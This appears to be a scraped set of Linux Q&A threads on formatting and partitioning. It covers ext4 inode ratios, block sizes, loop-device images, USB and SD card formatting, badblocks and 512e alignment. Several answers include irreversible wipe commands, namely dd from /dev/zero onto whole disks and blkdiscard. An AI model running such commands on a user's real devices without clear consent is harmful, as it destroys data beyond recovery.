select “Finish partitioning and write changes to disk” to continue the installationThe usage you select is used as the value of the -T parameter for mkfs.ext4.
|
My system needs a very high number of inodes on the partition because it is going to store many, many small files. (It's going to be an OSM, OpenStreetMap TileServer running mapnik and tirex).
As far I as learnt the number of inodes of a ext4 partition can only be created when formatting with mkfs.ext4 (see answer here). Increasing later is not possible but would require one to reformat (see comment here).
So it's really good to do it right at installation. Is there a way to pass arguments to mkfs.ext4 for mkfs.ext4 -T usage-type /dev/something? So I could mkfs.ext4 -T news /dev/something (usage type news has a lot of inodes).
| How to increase number of inodes at partitioning during installation of Debian? |
lsblk -o NAME,FSTYPE -dsnThis will print a list of block devices that are not themselves holders for partitions (they do not have a partition table). The detected file system type is in the second column. If its blank there is no recognized file system.
So to get the output you want in one command
lsblk -o NAME,FSTYPE -dsn | awk '$2 == "" {print $1}' |
I want to capture all disks that do not have a filesystem ( all disks that mkfs not runs on them )
I tried the below, but still gives the OS ( sda ).
What is the best approach with lsblk or other command to capture all disks that are without filesystem?
lsblk -f | egrep -v "xfs|ext3|ext4"
NAME FSTYPE LABEL UUID
MOUNTPOINT
fd0
sda
└─sda2 LVM2_member v0593a-KiKU-9emb-STbx-ByMz-S95k-jChr0m
├─vg00-lv_swap swap 1beb675f-0b4c-4225-8455-e876cafc5756
[SWAP]
sdg
sdh
sdi
sdj
sdk
sr0 | How to capture all disks that don’t have a file system |
update: From looking at lsusb and dmesg, confirmed that the drive has dropped off the USB bus. So the mkfs has hung. kill -9 on it may stop it and allow the mdraid array to be stopped, or a reboot may be required. If you have to reboot, beware that the system may not reboot cleanly—so it'd be best to sync and unmount/remount read-only any other writable filesystems as you may have to hit reset.
Depending on the filesystem and options, mkfs can take a long time (and ext3 is one where it does). It is safe to terminate, but of course you'll have to run mkfs again. Which—if it was actually making progress—means you'll have to wait again (and it will start over from the beginning).
ext4 is much faster to mkfs, especially with lazy_itable_init (which is the default). If possible, switch.
Remember with an ext2/3/4 filesystem, x% of the disk is consumed for inode tables. Without lazy_itable_init, they're all being written now. That's a lot of data to write (approximately 1.6% of the disk with default settings), and spread out over the entire disk no less.
That also gives another way to reduce the time: write fewer inodes. But of course if you go too low, you'll run out.
If you want to check if it's actually making progress, confirm if I/O is happening. Some disks have an indicator light, or you can often tell (with magnetic disks) by holding your ear close and listening.
Alternatively, if you have iostat available, iostat -kx 10 will show you first IO stats since boot, then every 10s statistics over the prior 10s. You can look for the number of writes being done, and the disk utilization.
|
I'm doing data recovery right now from a disk I've extracted from an old NAS.
It looks like mkfs.ext3 froze on Writing superblocks and filesystem accounting information: since it's more that one hour that I'm waiting for done to appear.
The disk is 2TB SATA connected to USB 3.0, is it normal it takes so long? Is it safe to terminate the program now?
| mkfs taking too long |
There is better alternative than dd to extend a file. The dd command requires several parameters to run properly (to not corrupt your data). I use truncate instead. Despite of its name it can extend the size of a file as well:truncate - shrink or extend the size of a file to the specified size
-s, --size=SIZE
set or adjust the file size by SIZE
SIZE is an integer and optional unit (example: 10M is 10*1024*1024). Units > are K, M, G, T, P, E, Z, Y (powers of 1024) or KB, MB, ... (powers of 1000).
SIZE may also be prefixed by one of the following modifying characters: '+' extend by, '-' reduce by, '<' at most, '>' at least, '/' round down to multiple
of, '%' round up to multiple of.thus,
truncate -s +1G MyDrive.vhdsafely expands your file by 1 gigabyte.
And, yes, it does sparse expansion when supported by the underlying filesystem, so the actual blocks would be allocated on demand.
When a file is expanded, don't forget to run resize2fs:
resize2fs MyDrive.vhdAlso, the whole thing may be done online (without umount'ing the device) for file systems that support online resize:
losetup -c loopdevupdates in-kernel information on a backing file,
and
resize2fs loopdevresizes the mounted file system online
|
I found a very nice tutorial on how to create virtual hard disks, and I am considering using these for my work in order to store reliably and portably large datasets with associated processing results.
Basically, the tutorial consist in doing this:
dd if=/dev/zero of=MyDrive.vhd bs=1M count=500
mkfs -t ext3 MyDrive.vhd
mount -t auto -o loop MyDrive.vhd /some/user/folderwhich creates a virtual hard drive of 500MB formatted in ext3 and mounts it somewhere.
Now say I use that file and realise I need more than 500MB, is there a way of "dynamically" resizing the virtual disk? (By dynamically I mean other than creating a new bigger disk and copy the data over.)
| Resizing a virtual hard drive |
The loop device is what you need for this. Run these commands as root:
truncate -s1G 1GB.img # Sparse allocation of a 1GB file
ld=$(losetup --show --find 1GB.img); echo "$ld"You will now have a loop device (for example, /dev/loop0) that you can treat as a block device.
mkfs -t btrfs "$ld" # Device that was returned from losetupmkdir -p /mnt/dsk
mount "$ld" /mnt/dskWhen you've finished, tidy up again
umount /mnt/dsk
losetup -d "$ld"
rm 1GB.imgIf you want to create a partition table on the block device, make sure you always include the --partscan flag on the losetup command. This will create the associated devices, for example, /dev/loop0p1.
|
I want to do a few experiments on the btrfs file system, but I don't want to make any changes to my existing partitions, and I want full control over things like device size.
Is it possible to create a file that looks like a block device that I can mount and unmount, and that will act like a block device such as running out of space?
| Create a file that's treated like a btrfs file system |
As @derobert mentioned in the comment.
mkfs.ext4/mke2fs refers to /etc/mke2fs.conf and formats the partition.
mke2fs chooses block size based on the partition size if not explicitly mentioned. Read -b block-size and -T usage-type in mke2fs man page for the same.
So when partition size is less than 512MB mkfs.ext4 formats it as small with following settings from mke2fs.conf file.
small = {
blocksize = 1024
inode_size = 128
inode_ratio = 4096
}However when partition size is more than 512MB mkfs.ext4 or mke2fs formats partition using defaults from mke2fs.conf file
[defaults]
base_features = sparse_super,filetype,resize_inode,dir_index,ext_attr
default_mntopts = acl,user_xattr
enable_periodic_fsck = 0
blocksize = 4096
inode_size = 256
inode_ratio = 16384That's what was causing different block sizes in the different partitions for me.
One more note. To get total number of inode you will get after formatting can be calculated as follows,
Total number of inodes = partition size / inode_ratio
e.g.
for 500MB partition
total number of inodes = (500 * 1024 * 1024) / 4096
= 128000NOTE: I think I am missing something here, because for the calculations I have shown above, actual value shown by tune2fs is Inode count: 128016 which nearly matches but not exact.
|
we have BBB based custom board with 256MB RAM and 4GB eMMC,
I have partitioned it using below code,
parted --script -a optimal /dev/mmcblk0 \
mklabel gpt \
mkpart primary 128KiB 255KiB \
mkpart primary 256KiB 383KiB \
mkpart primary 384KiB 511KiB \
mkpart primary 1MiB 2MiB \
mkpart primary 2MiB 3MiB \
mkpart primary 3MiB 4MiB \
mkpart primary 4MiB 5MiB \
mkpart primary 5MiB 10MiB \
mkpart primary 10MiB 15MiB \
mkpart primary 15MiB 20MiB \
mkpart primary 20MiB 21MiB \
mkpart primary 21MiB 22MiB \
mkpart primary 22MiB 23MiB \
mkpart primary 23MiB 28MiB \
mkpart primary ext4 28MiB 528MiB \
mkpart primary ext4 528MiB 1028MiB \
mkpart primary ext4 1028MiB 1128MiB \
mkpart primary ext4 1128MiB 1188MiB \
mkpart primary ext4 1188MiB 2212MiB \
mkpart primary ext4 2212MiB 2603MiB \
mkpart primary ext4 2603MiB 2639MiB \
mkpart primary ext4 2639MiB 100% \And then formatted file system partitions using below command
mkfs.ext4 -j -L $LABEL $PARTITIONNow when I read file system block size using tune2fs, I see different value for partitions less than 1GiB and partition greater or equal to 1GiB partition.
# tune2fs -l /dev/mmcblk0p15 | grep Block
Block count: 512000
Block size: 1024
Blocks per group: 8192
#
#
# tune2fs -l /dev/mmcblk0p16 | grep Block
Block count: 512000
Block size: 1024
Blocks per group: 8192
#
#
# tune2fs -l /dev/mmcblk0p19 | grep Block
Block count: 262144
Block size: 4096
Blocks per group: 32768
# tune2fs -l /dev/mmcblk0p22 | grep Block
Block count: 1191936
Block size: 4096
Blocks per group: 32768I am not able to understand why block sizes are different.
moreover mke2fs.conf is having all default values only and blocksize mentioned there is 4096.
[defaults]
base_features = sparse_super,filetype,resize_inode,dir_index,ext_attr
default_mntopts = acl,user_xattr
enable_periodic_fsck = 0
blocksize = 4096
inode_size = 256
inode_ratio = 16384[fs_types]
ext3 = {
features = has_journal
}
ext4 = {
features = has_journal,extent,huge_file,flex_bg,uninit_bg,dir_nlink,extra_isize
auto_64-bit_support = 1
inode_size = 256
}
ext4dev = {
features = has_journal,extent,huge_file,flex_bg,uninit_bg,dir_nlink,extra_isize
inode_size = 256
options = test_fs=1
}
small = {
blocksize = 1024
inode_size = 128
inode_ratio = 4096
}
floppy = {
blocksize = 1024
inode_size = 128
inode_ratio = 8192
}
big = {
inode_ratio = 32768
}
huge = {
inode_ratio = 65536
}
news = {
inode_ratio = 4096
}
largefile = {
inode_ratio = 1048576
blocksize = -1
}
largefile4 = {
inode_ratio = 4194304
blocksize = -1
}
hurd = {
blocksize = 4096
inode_size = 128
}Can someone explain/suggest a doc/hint why block sizes are different for different partitions?
| File system block size differs between different ext4 partitions |
You generally don't want to write the filesystem on the entire block device (ie. /dev/sdd), you want to create a partition and then put the filesystem in there (ie. /dev/sdd1). That is also what your mkfs complained about.
If you are sure you only want to have one filesystem on this disk at a time, and you don't need a bootloader, you can safely ignore this warning using mkfs.vfat -I, and use the whole device. Otherwise, create a partitioning scheme using fdisk or similar (you can create a basic, full one with o, n, p, 1, Enter, Enter, w), and install the filesystem at /dev/sdd1 (or whichever partition you want to use).
If you only plan to use FAT on this device, with no MBR, then it is safe to install to the full device. Otherwise, use a partition table.
|
I have installed Arch Linux ISO file into Flash disk with the following command:
dd bs=2M if=~/archlinux-2013.11.01-dual.iso of=/dev/sddNow I'm trying to format the flash disk with the following command:
sudo mkfs.vfat -F 32 /dev/sddBut it gets me the following error :mkfs.vfat: Device partition expected, not making filesystem on entire
device '/dev/sdd' (use -I to override)The output of sudo fdisk -l:
Disk /dev/sda: 298.1 GiB, 320072933376 bytes, 625142448 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xf3286bd2Device Boot Start End Blocks Id System
/dev/sda1 * 119700315 154850534 17575110 83 Linux
/dev/sda2 19834880 119700314 49932717+ 7 HPFS/NTFS/exFAT
/dev/sda3 154850535 174385574 9767520 83 Linux
/dev/sda4 174385575 625137663 225376044+ f W95 Ext'd (LBA)
/dev/sda5 174385638 185610192 5612277+ 82 Linux swap / Solaris
/dev/sda6 185610256 338423679 76406712 7 HPFS/NTFS/exFAT
/dev/sda7 338423808 477687807 69632000 7 HPFS/NTFS/exFAT
/dev/sda8 477689856 625137663 73723904 7 HPFS/NTFS/exFATPartition table entries are not in disk order.Disk /dev/sdd: 7.5 GiB, 8019509248 bytes, 15663104 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00000000 | Problem with formatting Flash Disk |
It should be mkfs.vfat -I /dev/sdb. sdb1 indicates you probably have more than one partition, and you're just formatting the first one, which happens to be 64MiB.
|
I have a USB drive which I format with
sudo mkfs.vfat -I /dev/sdb1When I then look at the size of the USB drive with df -h, it reports its size to be 64 MB, though it should be 8 GB. What am I doing wrong?
fdisk -l /dev/sdb1 gives
Disk /dev/sdb1: 67 MB, 67108864 bytes
241 heads, 62 sectors/track, 8 cylinders, total 131072 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00000000 Device Boot Start End Blocks Id System | Format USB drive |
tune2fs applies only to ext[2-4] filesystems; not to XFS ones. The "Bad magic number in super-block" simply means that tune2fs doesn't understand the filesystem type. As you noted, the fact that your filesystem can be mounted confirms that it's viable.
The XFS equivalent of of tune2fs -l is xfs_info.
|
I ran into this message two days ago=:
tune2fs: Bad magic number in super-block while trying to open /dev/vdc1
Couldn't find valid filesystem superblock.The system is Ubuntu, a KVM virtual machine under CentOS (host). And I have to add a new XFS file system on a new virtual hard drive.
The new virtual hard drive is displayed as /dev/vdc, I created a new partition:
fdisk /dev/vdc
n
p
default
+20G
wThen I use mkfs to change the partition into XFS:
mkfs.xfs -i size=1024 /dev/vdc1And this is the result of fdisk -l:
root@server1:/# fdisk -l....Disk /dev/vdc: 21.5 GB, 21474836480 bytes
3 heads, 34 sectors/track, 411206 cylinders, total 41943040 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0xc6bdd34aDevice Boot Start End Blocks Id System
/dev/vdc1 2048 41943039 20970496 83 Linux....And this is the result of blkid (/dev/vdc1 is XFS):
root@server1:/# blkid
/dev/vda1: UUID="2a5dd605-7774-4977-8f6c-79f70f222a65" TYPE="ext2"
/dev/vda5: UUID="aBuqo9-bgg0-gRLK-g5aG-xC9c-tdRx-znG819" TYPE="LVM2_member"
/dev/vdb: UUID="8L5N3N-EDmg-716P-Kk0t-4DID-x686-Ytlh2y" TYPE="LVM2_member"
/dev/vdc1: UUID="468ec0df-089b-4225-8519-fd4022db24ed" TYPE="xfs"
/dev/mapper/ubuntu--vg-root: UUID="61e644ad-2975-4017-879d-bb7933c7d6e9" TYPE="ext4"
/dev/mapper/ubuntu--vg-swap_1: UUID="01ca2938-35aa-4c5c-8de4-ed37dc971cd3" TYPE="swap" And /dev/vdc1 is mountable, which means there is no SuperBlock Errors:
root@server1:/# mkdir /data_test
root@server1:/# mount /dev/vdc1 /data_test
(mounted)And this is the result of df -h after mount /dev/vdc1:
root@server1:/# df -h
Filesystem Size Used Avail Use% Mounted on
udev 990M 12K 990M 1% /dev
tmpfs 201M 456K 200M 1% /run
/dev/mapper/ubuntu--vg-root 47G 2.2G 43G 5% /
none 4.0K 0 4.0K 0% /sys/fs/cgroup
none 5.0M 0 5.0M 0% /run/lock
none 1001M 0 1001M 0% /run/shm
none 100M 0 100M 0% /run/user
/dev/vda1 236M 38M 186M 17% /boot
/dev/vdc1 20G 33M 20G 1% /data_testBut when I use tune2fs, it told me that /dev/vdc1 has superblock error:
root@server1:/# tune2fs -l /dev/vdc1 | grep -i inode
tune2fs: Bad magic number in super-block while trying to open /dev/vdc1
Couldn't find valid filesystem superblock.How can I fix this error? I tried other commands such as xfs_repair, xfs_check, but they all not work
| Use "tune2fs" on XFS filesystem, get "Couldn't find valid filesystem superblock." |
Using dd we can wipe the partition table. I remember having success with dd while failing with gdisk's zero feature. (Make sure that you have your data backed up).
# dd if=/dev/zero of=/dev/sda bs=512 count=1024 |
I'm attempting to install Arch Linux using the btrfs filesystem. I'm at the beginning of the install processes preparing my drive and I'm hitting an issue.
Firstly I begin to clear any GTP and MBR records from any previous installation attempts using:
gdisk /dev/sdaI then go into expert mode using x command and then use z to remove GTP and/or MBR.
I then use fdisk to create a new partition using the entire space on the drive - which is 119GB.
After creating the partition, and writing it, I then attempt to create the filesystem using:
mkfs.btrfs /dev/sda1But I get an error:
/dev/sda1 appears to contain an existing filesystem (btrfs)How is this so? All I have done is created a partition, so how can btrfs already exist as the filesystem type?
| Error when creating BTRFS Filesystem |
If you want to create a filesystem on your usb stick partition, you should do
mkfs -t vfat /dev/sdc1as a user who as access rights to write to the partition, like root
|
I have a memory stick which I had cleaned of old data fragments.
The memory stick was mounted on /dev/sdc1 so I did:
dd if=/dev/zero of=/dev/sdc1 bs=1MAfter the task was complete, my usb memory stick became unrecognized.
What do you do in this case to make the drive recognized again and partition it as FAT?
| How do you format a USB stick after it is being labled "unrecognised" by Ubuntu? |
The number hasn't been ignored, it's been rounded up. It looks like space for inodes are allocated in groups. See in your output:
Inodes per group: 1632When you request 99,000 inodes, that's not divisible by 1,632. So to ensure that you get the number of inodes you requested, the number has been rounded up to 99,552 which is divisible by 1,632.
It looks like this limit might be somehow derived from the number of block groups, where the number of inodes in each group is uniform across all block groups. My guess is that the number of inodes per block group is calculated as the number of inodes requested divided by the number of block groups and then rounded up to a whole number. See Ext2 on OSDev WikiWhat is a Block Group? Blocks, along with inodes, are divided up into "block groups." These are nothing more than contiguous groups of
blocks.
Each block group reserves a few of its blocks for special purposes
such as:...
A table of inode structures that belong to the group
.. |
I want to make ext2 file system. I want to set "number-of-inodes" option to some number. I tried several values:if -N 99000 then Inode count: 99552
if -N 3500 then Inode count:
3904
if -N 500 then Inode count: 976But always my value is not the same. Why?
I call mkfs this way
sudo mkfs -q -t ext2 -F /dev/sda2 -b 4096 -N 99000 -O none,sparse_super,large_file,filetypeI check results this way
$ sudo tune2fs -l /dev/sda2
tune2fs 1.46.5 (30-Dec-2021)
Filesystem volume name: <none>
Last mounted on: <not available>
Filesystem UUID: 11111111-2222-3333-4444-555555555555
Filesystem magic number: 0xEF53
Filesystem revision #: 1 (dynamic)
Filesystem features: filetype sparse_super large_file
Filesystem flags: signed_directory_hash
Default mount options: user_xattr acl
Filesystem state: clean
Errors behavior: Continue
Filesystem OS type: Linux
Inode count: 99552
Block count: 1973720
Reserved block count: 98686
Overhead clusters: 6362
Free blocks: 1967353
Free inodes: 99541
First block: 0
Block size: 4096
Fragment size: 4096
Blocks per group: 32768
Fragments per group: 32768
Inodes per group: 1632
Inode blocks per group: 102
Filesystem created: Thu Apr 6 20:00:45 2023
Last mount time: n/a
Last write time: Thu Apr 6 20:01:49 2023
Mount count: 0
Maximum mount count: -1
Last checked: Thu Apr 6 20:00:45 2023
Check interval: 0 (<none>)
Reserved blocks uid: 0 (user root)
Reserved blocks gid: 0 (group root)
First inode: 11
Inode size: 256
Required extra isize: 32
Desired extra isize: 32
Default directory hash: half_md4
Directory Hash Seed: 61ff1bad-c6c8-409f-b334-f277fb29df54 | mkfs ext2 ignore number-of-inodes |
A physical sector size of 4096 means that the data on the drive is laid out in units of 4096 bytes, i.e. disk comprised of sequential "compartments" of 4096 bytes, that have to be written atomically. For compatibility reasons, most disks with 4096 byte sectors present themselves as having traditional 512 byte "logical sectors", which means the addressing unit is a 512 byte block.
The practical implication of this emulation of a 512 sector drive with an underlying disk with 4096 byte sectors is a potential performance issue. When writing a single 512 byte sector to a 512e disk, the drive must read the whole 4096 byte sector containing the 512-byte sector, modify the sector in RAM (on the disk controller) by replacing the 512-byte sector with the new contents, and finally write the whole 4096 sector back to the disk. Things get worse if you are reading or writing a couple of consecutive 512 sectors that happen to cross a 4096 sector boundary.
File systems usually lay out their data structures well, i.e. they are aligned to multiples of at least 4096 bytes, so the bigger sector size normally does not present a problem. This all breaks down, however, if the partition containing the file system itself is not aligned properly. In the case of a 512e disk, the partitions should be aligned so that the first 512-byte logical sector number is a multiple of eight.
|
I just plugged into USB A 3.0 / C 3.1 my new external HDD to Debian Buster system.
The disk was sold as LaCie 2.5" Porsche Design P'9227 2TB USB-C.
Here is the output of fdisk -l /dev/sdc:
Disk /dev/sdc: 1.8 TiB, 2000398934016 bytes, 3907029168 sectors
Disk model: P9227 Slim
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 4096 bytes
I/O size (minimum/optimal): 4096 bytes / 33553920 bytesI just read some articles about 4k-emulated drives (512e), this one should be the case.
I am confused as to how to format it with NTFS.
I tried to use my brain, and here is what I came with:Start sector of the partition should probably start on 4096 sector (?)
So I created a partition with gdisk like this:
Device Start End Sectors Size Type
/dev/sdc1 4096 3907029134 3907025039 1.8T Microsoft basic dataSector size should probably be forced with the --sector-size option like I did (?) issuing:
mkfs.ntfs --no-indexing --verbose --with-uuid --label EXTERNAL_2TB --quick --sector-size 4096 /dev/sdc1EDIT1:
Windows 10 fully updated did not recognize the partition and asked me to format, I used my favorite tool for that, and back to Linux here is the output of fdisk -l /dev/sdc:
Device Start End Sectors Size Type
/dev/sdc1 2048 3907028991 3907026944 1,8T Microsoft basic dataSo why it must start at sector 2048, I don't understand.EDIT2:
I don't understand what I am doing wrong in terms of compatibility with Windows. Every time I re-partition it / re-format it and boot Windows and plug the drive in, it just offers me to Format it itself.
I am quite positive I tried everything from inside gdisk + mkfs.ntfs.
I would like to know why I am unable to do the same as Windows does from my Linux CLI.I will answer all questions tomorrow morning as well as comments.
I am now running:
pv --progress --timer --eta --rate --average-rate --bytes -s 1953314876k < /dev/zero > /media/vlastimil/LACIE_2TB/zerowith an expected speed of 123 MiB/s.
| Partitioning and formatting a 4k-emulated (512e) HDD |
Because of the way the filesystem is built. It's a bit messy, and by default, you can't even have the ratio as down as 1/64 MB.
From the Ext4 Disk Layout document on kernel.org, we see that the file system internals are tied to the block size (4 kB by default), which controls both the size of a block group, and the amount of inodes in a block group. A block group has a one-block sized bitmap of the blocks in the group, and a minimum of one block of inodes.
Because of the bitmap, the maximum block group size is 8 blocks * block size in bytes, so on an FS with 4 kB blocks, the block groups are 32768 blocks or 128 MB in size. The inodes take one block at minimum, so for 4 kB blocks, you get at least (4096 B/block) / (256 B/inode) = 16 inodes/block
or 16 inodes per 128 MB, or 1 inode per 8 MB.
At 256 B/inode, that's 256 B / 8 MB, or 1 byte per 32 kB, or about 0,003 % of the total size, for the inodes.
Decreasing the number of inodes would not help, you'd just get a partially-filled inode block. Also, the size of an inode doesn't really matter either, since the allocation is done by block. It's the block group size that's the real limit for the metadata.Increasing the block size would help, and in theory, the maximum block group size increases in the square of the block size (except that it seems to cap at a bit less than 64k blocks/group). But you can't use a block size greater than the page size of the system, so on x86, you're stuck with 4 kB blocks.However, there's the bigalloc feature that's exactly what you want:for a filesystem of mostly huge files, it is desirable to be able to allocate disk blocks in units of multiple blocks to reduce both fragmentation and metadata overhead. The bigalloc feature provides exactly this ability.
The administrator can set a block cluster size at mkfs time (which is stored in the s_log_cluster_size field in the superblock); from then on, the block bitmaps track clusters, not individual blocks. This means that block groups can be several gigabytes in size (instead of just 128MiB); however, the minimum allocation unit becomes a cluster, not a block, even for directories.You can enable that with mkfs.ext4 -Obigalloc, and set the cluster size with -C<bytes>, but mkfs does note that:
Warning: the bigalloc feature is still under development
See https://ext4.wiki.kernel.org/index.php/Bigalloc for more informationThere are mentions of issues in combination with delayed allocation on that page and the ext4 man page, and the words "huge risk" also appear on the Bigalloc wiki page.None of that has anything to do with that 64 MB / inode limit set by the -i option. It appears to just be an arbitrary limit set at the interface level. The number of inodes can also be set directly with the -N option, and when that's used, there are no checks. Also, the upper limit is based on the maximum block size of the file system, not the block size actually chosen as the structural limits are.
Because of the 64k blocks/group limit, without bigalloc there's no way to get as few inodes as the ratio of 64 MB / inode would imply, and with bigalloc, the number of inodes can be set much lower than it.
|
Formatting a disk for purely large video files, I calculated what I thought was an appropriate bytes-per-inode value, in order to maximise usable disk space.
I was greeted, however, with:
mkfs.ext4: invalid inode ratio [RATIO] (min 1024/max 67108864)I assume the minimum is derived from what could even theoretically be used - no point having more inodes than could ever be utilised.
But where does the maximum come from? mkfs doesn't know the size of files I'll put on the filesystem it creates - so unless it was to be {disk size} - {1 inode size} I don't understand why we have a maximum at all, much less one as low as 67MB.
| Why is 67108864 the maximum bytes-per-inode ratio? Why is there a max? |
From man badblocks:
-o output_file
Write the list of bad blocks to the specified file. Without
this option, badblocks displays the list on its standard output.
The format of this file is suitable for use by the -l option in
e2fsck(8) or mke2fs(8).So the correct way would be:
badblocks -o filename /dev/sde1
mkfs.vfat -l filename /dev/sde1 |
mkfs.vfat -c does a simple check for badblocks.badblocks runs multiple passes with different patterns and thus detects intermittent errors that mkfs.vfat -c will not catch.
mkfs.vfat -l filename can read a file with badblocks from badblocks. But I have been unable to find an example on how to generate the file using badblocks.
My guess is that it is as simple as:
badblocks -w /dev/sde1 > filename
mkfs.vfat -l filename /dev/sde1But I have been unable to confirm this. Is there an authoritative source that can confirm this or explain how to use badblocks to generate input for mkfs.vfat -l filename?
| Using badblocks with mkfs -l |
The error message is because it is asking a yes/no question, and "1" is not yes or no. Don't use parted's mkfs command: it is incomplete ( doesn't even support ntfs ), broken, and was removed from parted upstream several releases/years ago beacuse of this. Use mkntfs instead.
|
Screenshot:
http://imgur.com/DQnhwG2I'm trying to format an existing ext2 partition as ntfs (or any filesystem) using the mkfs command in Parted, but when I specify the partition to format I get:
parted: invalid token: 1"1" being the partition number I specified. I'm not sure what's wrong. The goal here is to find the correct command. I'm not interested in work-arounds using a different program. I'm just doing this to learn the ins/outs of Parted. I've already read the manuals, and a ton of blog posts. The command I used was:
$ mkfs 1 ntfsDetails:Ubuntu 12.04 - Desktop X86-64
Parted 2.3
There is no valuable data on the machine. It's just a vm running Ubuntu with 2 virtual hard drives attached. Sda: Ubuntu Sdb: The drive for testing Parted | Error "parted: invalid token: 1" When Using Parted To Format A Partition? |
A label is a property of a filesystem, not of a disk.
You can use e2label to label an extN filesystem (for N={ 2, 3, 4 }). For an FAT filesystem you would need to use fatlabel, mlabel, or another FAT-aware tool.
You seem to have created an extN filesystem on the first disk /dev/sda directly rather than through a partition table. This is a generally a really bad idea: you should (almost) always have a partition table for a disk.
The problem with a filesystem directly on the disk (/dev/sda) rather than a partition (such as /dev/sda1) is that you cannot use the disk for anything other than that one filesystem.
Worryingly, from your later edit showing lsblk output, you had other partitions on the disk. At best you've corrupted the first partition table and the disk is using its backup near the end of the disk. At worst you've also overwritten data on one or more of the partitions.
Right now, I would be inclined to recommend that you backup all your data on this disk and rebuild it. Once you've backed it up and tested that the backup was successful, if you're feeling adventurous you could try rebuilding the primary GPT. It seems that gdisk with the r and then c options should do this but I have not tried it. I think I'd be happier wiping the disk and restoring my data.
|
So I have three disks. I had thought to label the volumes themselves:
$ e2label /dev/sda
d80-JD-75MS$ e2label /dev/sdb
e2label: Bad magic number in super-block while trying to open /dev/sdb
Found a dos partition table in /dev/sdb$ e2label /dev/sdc
e2label: Bad magic number in super-block while trying to open /dev/sdc
Found a dos partition table in /dev/sdc... All three disks are bootable. fdisk reports no errors on any of them. But the usual ext4 utilities all report the same thing or very close:
"Couldn't find a valid filesystem superblock
Found a dos partition table in ..."/dev/sdb is a band new install of Debian 11 all kosher but somehow e2label isn't happy with it. Apart from that, I can detect no kind of trouble but what's going on with the 'superblock' issue? Is that fixable?
BTW one thing that seemed promising was:
mkfs.ext4 -L "wipeout" /dev/sda... which added a label alright, but also wiped out everything on the disk :(
... so this is naughty?"
$ e2label /dev/sda "bad bad bad"$ lsblk /dev/sda -o name,label,fstype,mountpoint,size,model
NAME LABEL FSTYPE MOUNTPOINT SIZE MODEL
sda bad bad bad ext4 74.5G WDC_WD800JD-75MSA3
├─sda1 d1--5-swap swap 5G
├─sda2 d2--0-boot ext4 /media/sda/2 200M
├─sda3 d3--6-root ext4 /media/sda/3 6G
├─sda4 ... the command is happy to execute, the command is about LABELING a FS, not creating one. Nothing seems to have broken. I'm happy. What I want to know is why I get those 'bad magic number' messages on the other two disks.
| Bad magic number in super-block |
I was indeed missing xfsprogs, which upon installing did solve my issue.
So, first install the package:
sudo apt-get install xfsprogsthen:
sudo mkfs -t xfs -n ftype=1 /dev/sdb -f |
While working on a fresh install of debian on GCP, I am trying to format a disk to xfs.
sudo mkfs -t xfs -n ftype=1 /dev/sdb -fwhich gives me this error:
mkfs: failed to execute mkfs.xfs: No such file or directoryAny thoughts? I guess I need to install something but the error does not make it clear what to install.
| Fail to format disk, missing mkfs file. [mkfs: failed to execute mkfs.* : No such file or directory] |
The kernel is still using the old partition table.
Issue partprobe for the kernel to use the new partition table or reboot.
See man partprobe for the gory details.
EDIT (thanks to comments):
gdisk prints the following Warning message informing you that the kernel is still using the old partition table, inviting you to restart.Warning: The kernel is still using the old partition table.
The new table will be used at the next reboot.
The operation has completed successfully.fdisk and parted (including gparted) do the partprobe automatically and inform you whether it succeeded or not.
|
I just bought two new 4TB external USB disks for backups
http://www.bestbuy.com/site/wd-my-passport-4tb-external-usb-3-0-portable-hard-drive-black/5605533.p
that came performatted with a single large ms partition. I'm running slackware 14.2x64, and ran gdisk to d(elete) that partition and make three n(ew) 1.2TB partitions (just dividing the total sectors by three). Then I w(rote) the partition table info and gdisk exited. And then both fdisk -l and gdisk -l /dev/sdb showed everything looking exactly like I'd expected it should.
But then mkfs -t ext4 /dev/sdb1 said it saw the original ms partition, and asked whether or not to proceed. I said no, and tried gdisk several more times, d(eleting) and re-n(ewing) all three partitions. Also tried sync, and tried unplugging the drive and re-plugging it. Nothing worked. I finally tried letting mkfs start to format the ms partition it reported, and killed it after a minute. Then re-ran gdisk yet again. And now, finally, mkfs saw the new partition table. And everything proceeded smoothly.
But what was I doing wrong? That is, how do you run gdisk so that the subsequent mkfs correctly and immediately sees the partition table you just w(rote) using gdisk? I wouldn't think that what I ended up doing is the recommended procedure.
| linux gdisk (on 4TB USB drive) followed my mkfs -- but mkfs doesn't see new partitions |
REMINDER: commands like this are designed to overwrite filesystem data. You must take extreme care to avoid targeting the wrong disk.
EDIT:
Before formatting the card, you may also want to perform a discard operation.
blkdiscard /dev/mmcblk0This might improve performance - the same as TRIM on a SATA SSD. Resetting the block remapping layer might also theoretically help resolve corruption at or around that layer, although this method is not as good as a dedicated full device erase command (SATA secure erase). This may not be suppported by all card readers. On my Dell Latitude laptop, it reset the card to all-zeros in one second. This implies that on this card it only affected the block remapping layer; it cannot have performed an immediate erase of the entire 16GB of flash.MicroSD cards contain one or more flash chips and a small microprocessor that acts as an interface between the SD card specification and the flash chip(s). Cards are typically formatted from the factory for near-optimal performance. However, most operating systems default partitioning and formatting utilities treat the cards like traditional hard drives. What works for traditional hard drives results in degraded performance and lifetime for flash-based cardshttp://3gfp.com/wp/2014/07/formatting-sd-cards-for-speed-and-lifetime/
A script is available for cards up to 32GiB. I have modified it to work with current versions of sfdisk. Running file -s on the resulting partition returned the same numbers as before, except for the number of heads/sectors per track. Those are not used by current operating systems, although apparently some embedded bootloaders will require specific values.
#! /bin/sh
# fdisk portion of script based on mkcard.sh v0.4
# (c) Copyright 2009 Graeme Gregory <[emailprotected]>
# Additional functionality by Steve Sakoman
# (c) Copyright 2010-2011 Steve Sakoman <[emailprotected]>
# Updated by Alan Jenkins (2016)
# Licensed under terms of GPLv2
#
